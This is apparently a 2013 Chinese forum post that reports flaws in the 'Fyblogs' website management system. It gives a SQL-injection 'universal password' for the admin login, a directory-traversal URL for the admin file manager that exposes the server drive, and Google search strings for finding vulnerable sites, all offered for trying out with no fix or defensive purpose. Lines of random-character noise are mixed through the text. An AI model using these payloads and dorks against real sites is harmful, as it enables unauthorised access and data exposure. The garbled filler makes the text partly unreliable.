漏洞类型: 未授权访问/权限绕过
: r2 D* M/ O# o! o
' I, M* L0 F' R j简要描述:/ M6 s' \4 L0 H4 J
. B* K @$ E( l1 V$ j9 p
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
& {* _* @) Q. c6 @' |& h' I
0 I+ O& E/ V" E3 _8 C- [: {详细说明:
: ]4 Y6 K+ F, p2 F/ ]
* N2 k' q$ k; O& o; X2 x5 ?后台万能密码 'or'='or'
7 `% X7 V3 z$ k+ Q' `, X) I后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
6 d5 \1 f5 G# W8 ^5 padmin/uploadfile.asp?currentFolder=/upfiles/../# N# Y, f7 q7 q3 G" W) t u7 @: q9 g0 _( H
0 M7 ^- ]8 e, o( q4 E+ |) `0 t/ J( o
漏洞证明:
- H% K( s. O+ Z, l( W* M! t) W# l0 K- N& F
谷歌:inurl:type.asp?id=1 新闻中心3 D5 W1 C$ `2 K) D2 s
或者 :inurl:download_ok.asp?
( b2 a; h, c5 m% G" p
`. ~: q- ^) O: O; D$ A2 C, T可以测试
$ H n" R9 ~7 N9 u
* H6 _; l/ Q8 y
7 ~) Y2 E- Y5 @1 C |
发表于 2013-3-7 13:07:46
收藏
支持
反对